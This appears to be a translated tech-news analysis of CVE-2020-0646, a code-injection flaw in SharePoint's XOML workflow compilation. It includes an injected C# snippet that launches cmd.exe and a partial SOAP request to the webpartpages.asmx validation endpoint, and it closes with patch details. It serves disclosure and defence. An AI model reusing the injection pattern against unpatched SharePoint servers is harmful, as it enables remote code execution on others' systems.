Shulou(Shulou.com)05/31 Report--

This article introduces how to analyze remote code execution vulnerabilities in SharePoint. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

In November 2019, security researchers discovered a code injection vulnerability in Microsoft SharePoint Online's workflow and reported it to Microsoft. Once an attacker successfully exploits this vulnerability, he will be able to implement remote code execution on the target system. After obtaining the vulnerability information, Microsoft fixed the relevant vulnerabilities on the online platform as soon as possible, but did not fix the problems in the .NET Framework until January 2020. Therefore, if your version of SharePoint On-Rremise does not install the January 2020 .NET patch, you will still be affected by this vulnerability.

It is important to note that if your IIS configuration supports .XOML extensions, you may also be affected by this vulnerability when uploading files.

Vulnerability Analysis of CVE-2020-0646

When compiling XOML format files, attackers can use certain parameters in the System.Workflow.Activities namespace to execute arbitrary code on the SharePoint server. Precisely because an attacker can execute arbitrary code, this vulnerability can also be used to bypass the nocode option of the Workflow compiler.

The following XOML file shows an example of using the CallExternalMethodActivity class:

During compilation, an attacker can inject the value of the InterfaceType attribute into the C# temporary file that has just been generated:

... Private void InitializeComponent () {… This.codeActivity1.InterfaceType = typeof (System.String);} Object/**/test2=System.Diagnostics.Process.Start ("cmd.exe", "/ c calc"); private/**/void/**/foobar () {/ /); … }...

Once this is done, the attacker can bypass the original function and try to implement arbitrary code execution. It is worth mentioning that in the above example, when the InterfaceType property is affected, other String type properties (such as MethodName) have been correctly validated or escaped.

In addition, the ExecuteCode parameter in the CodeActivity class is also affected by this utilization, but we cannot exploit and attack this parameter in the online version of SharePoint, it can only be used in the On-Premise version. Of course, there are probably other Activity classes that will be potentially affected.

For example, in the following example, the attacker executed arbitrary code on the SharePoint Online version using the following HTTP request:

POST http://[REDACTED].sharepoint.com/_vti_bin/webpartpages.asmx HTTP/1.1Date: Tue, 29 Oct 2019 14:26:21 GMTMIME-Version: 1.0Accept: * / * SOAPAction: http://microsoft.com/sharepoint/webpartpages/ValidateWorkflowMarkupAndCreateSupportObjectsUser-Agent: Mozilla/4.0 (compatible; MS FrontPage 15.0) Host: [REDACTED] .sharepoint.comAccept-Language: en-us, en;q=0.1Accept: auth/sicilyX-FORMS_BASED_AUTH_ACCEPTED: TContent-Type: text/xml Charset=utf-8X-Vermeer-Content-Type: text/xml; charset=utf-8Accept-encoding: gzip, deflateConnection: Keep-AlivePragma: no-cacheContent-Length: 1031Cookie: [REDACTED]] > 2

After the attack is complete, we can see the corresponding DNS name that the host needs to resolve:

In addition, attackers can also take advantage of the above requests to exploit vulnerabilities in the On-Premise version and carry out attacks.

After the patch for vulnerability CVE-2020-0646 is installed, SharePoint's workflow checks all XML elements and attributes to ensure that they contain only a limited number of legal characters. Therefore, when using the selected nocode option, the attacker will not be able to inject arbitrary code into the generated C # code in the default configuration.

This is the end of how to analyze remote code execution vulnerabilities in SharePoint. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.